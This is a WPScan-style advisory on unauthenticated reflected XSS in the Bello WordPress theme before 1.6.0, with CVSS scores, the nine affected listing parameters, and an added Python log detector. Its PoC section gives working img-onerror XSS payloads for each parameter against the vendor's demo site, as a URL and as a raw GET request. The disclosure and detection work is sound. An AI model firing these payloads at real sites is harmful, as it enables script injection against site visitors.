wpvulndb | m0ze | WPVDB-ID: 6B5B42FD-028A-4405-B027-3266058029BB
History: May 16, 2021 - 12:00 a.m.

Bello < 1.6.0 - Unauthenticated Reflected XSS & XFS

2021-05-16 00:00:00
m0ze
wpscan.com
10

6.1 Medium (CVSS3)
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: REQUIRED
Scope: CHANGED
Confidentiality Impact: LOW
Integrity Impact: LOW
Availability Impact: NONE
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

4.3 Medium (CVSS2)
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: PARTIAL
Availability Impact: NONE
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N

The theme did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameters in its listing page, leading to reflected Cross-Site Scripting issues.
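The following detector is an added example and is not code from the advisory, from WPScan or from the Bello theme. It applies per-parameter allow-list rules to the nine listing-page parameters named above when scanning web-server access logs; the listing path suffix, the expected value formats and the sample log lines are assumptions constructed for illustration, not the theme's real validation.

```python
# Added example: flag listing-page requests whose advisory-listed parameters
# carry values outside an assumed legitimate format (markup characters in a
# latitude field, for instance). Parameter names are from the advisory; the
# path suffix, rules and sample log lines below are constructed assumptions.
import re
from urllib.parse import parse_qs, unquote, urlsplit

LISTING_PATH = "/listing/"                 # assumption: listing page path suffix
NUMERIC = re.compile(r"^-?\d+(\.\d+)?$")   # coordinates, distances, prices
FREE_TEXT = re.compile(r"^[^<>\"'`]*$")    # search text, but no markup or quotes

# Advisory parameter -> assumed legitimate value format (allow-list)
RULES = {
    "listing_list_view": re.compile(r"^[a-z_]+$"),
    "bt_bb_listing_field_my_lat": NUMERIC,
    "bt_bb_listing_field_my_lng": NUMERIC,
    "bt_bb_listing_field_distance_value": NUMERIC,
    "bt_bb_listing_field_my_lat_default": NUMERIC,
    "bt_bb_listing_field_keyword": FREE_TEXT,
    "bt_bb_listing_field_location_autocomplete": FREE_TEXT,
    "bt_bb_listing_field_price_range_from": NUMERIC,
    "bt_bb_listing_field_price_range_to": NUMERIC,
}

def suspicious_params(request_target: str) -> list[str]:
    """Return the advisory parameters whose decoded value violates its rule."""
    parts = urlsplit(request_target)
    if not parts.path.endswith(LISTING_PATH):
        return []
    query = parse_qs(parts.query, keep_blank_values=True)  # decodes once
    hits = []
    for name, rule in RULES.items():
        for raw in query.get(name, []):
            value = unquote(raw)  # second decode catches double-encoded values
            if not rule.fullmatch(value):
                hits.append(name)
                break
    return hits

def scan_log(lines):
    """Yield (client_ip, flagged_params) for combined-format GET log lines."""
    pattern = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "GET (\S+) HTTP/[\d.]+"')
    for line in lines:
        m = pattern.match(line)
        if m and (hits := suspicious_params(m.group(2))):
            yield m.group(1), hits

# Constructed sample lines: a benign search, then markup in the latitude field
SAMPLE_LOG = [
    '203.0.113.5 - - [16/May/2021:10:00:00 +0000] "GET /main-demo/listing/?listing_list_view=standard&bt_bb_listing_field_my_lat=51.5&bt_bb_listing_field_keyword=coffee HTTP/1.1" 200 1234',
    '198.51.100.7 - - [16/May/2021:10:00:05 +0000] "GET /main-demo/listing/?listing_list_view=standard&bt_bb_listing_field_my_lat=13%22%3E%3Cb%3Ex HTTP/1.1" 200 1234',
]
```

Running `list(scan_log(SAMPLE_LOG))` reports only the second client with `bt_bb_listing_field_my_lat` flagged; the same allow-list rules are the shape of the server-side validation the fixed theme needs before any of these values are echoed.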

PoC

[ Payloads: ]
[$] 13"–>">'-- [$]
###
[ PoC | Unauthenticated Reflected XSS & XFS | Listing search query: ]
[!] https://bello.bold-themes.com/main-demo/listing/?listing_list_view=standard13"-->“>'` -- `<!--<img src=”--><img src=x onerror=(alert)(`listing_list_view`);>&amp;bt;_bb_listing_field_my_lat=13"-->“>'` -- `<!--<img src=”--><img src=x onerror=(alert)(`bt_bb_listing_field_my_lat`);>&amp;bt;_bb_listing_field_my_lng=13"-->“>'` -- `<!--<img src=”--><img src=x onerror=(alert)(`bt_bb_listing_field_my_lng`);>&amp;bt;_bb_listing_field_distance_value=13"-->“>'` -- `<!--<img src=”--><img src=x onerror=(alert)(`bt_bb_listing_field_distance_value`);>&amp;bt;_bb_listing_field_my_lat_default=13&amp;bt;_bb_listing_field_my_lng_default=13&amp;bt;_bb_listing_field_keyword=13"-->“>'` -- `<!--<img src=”--><img src=x onerror=(alert)(`bt_bb_listing_field_keyword`);>&amp;bt;_bb_listing_field_location_autocomplete=13"-->“>'` -- `<!--<img src=”--><img src=x onerror=(alert)(`bt_bb_listing_field_location_autocomplete`);>&amp;bt;_bb_listing_field_category=all&amp;bt;_bb_listing_field_price_range_from=13"-->“>'` -- `<!--<img src=”--><img src=x onerror=(alert)(`bt_bb_listing_field_price_range_from`);>&amp;bt;_bb_listing_field_price_range_to=13"-->“>'` -- `<!--<img src=”--><img src=x onerror=(alert)(`bt_bb_listing_field_price_range_to`);> [!]

GET /main-demo/listing/?listing_list_view=standard13%22–%3E%22%3E%27%20--%20%3C!–%3Cimg%20src=%22–%3E%3Cimg%20src=x%20onerror=(alert)(listing_list_view);%3E&bt;_bb_listing_field_my_lat=13%22–%3E%22%3E%27%20--%20%3C!–%3Cimg%20src=%22–%3E%3Cimg%20src=x%20onerror=(alert)(bt_bb_listing_field_my_lat);%3E&bt;_bb_listing_field_my_lng=13%22–%3E%22%3E%27%20--%20%3C!–%3Cimg%20src=%22–%3E%3Cimg%20src=x%20onerror=(alert)(bt_bb_listing_field_my_lng);%3E&bt;_bb_listing_field_distance_value=13%22–%3E%22%3E%27%20--%20%3C!–%3Cimg%20src=%22–%3E%3Cimg%20src=x%20onerror=(alert)(bt_bb_listing_field_distance_value);%3E&bt;_bb_listing_field_my_lat_default=13&bt;_bb_listing_field_my_lng_default=13&bt;_bb_listing_field_keyword=13%22–%3E%22%3E%27%20--%20%3C!–%3Cimg%20src=%22–%3E%3Cimg%20src=x%20onerror=(alert)(bt_bb_listing_field_keyword);%3E&bt;_bb_listing_field_location_autocomplete=13%22–%3E%22%3E%27%20--%20%3C!–%3Cimg%20src=%22–%3E%3Cimg%20src=x%20onerror=(alert)(bt_bb_listing_field_location_autocomplete);%3E&bt;_bb_listing_field_category=all&bt;_bb_listing_field_price_range_from=13%22–%3E%22%3E%27%20--%20%3C!–%3Cimg%20src=%22–%3E%3Cimg%20src=x%20onerror=(alert)(bt_bb_listing_field_price_range_from);%3E&bt;_bb_listing_field_price_range_to=13%22–%3E%22%3E%27%20--%20%3C!–%3Cimg%20src=%22–%3E%3Cimg%20src=x%20onerror=(alert)(bt_bb_listing_field_price_range_to);%3E HTTP/1.1
Host: bello.bold-themes.com

Affected software (CPE)
Name: bello | Operator: lt | Version: 1.6.0
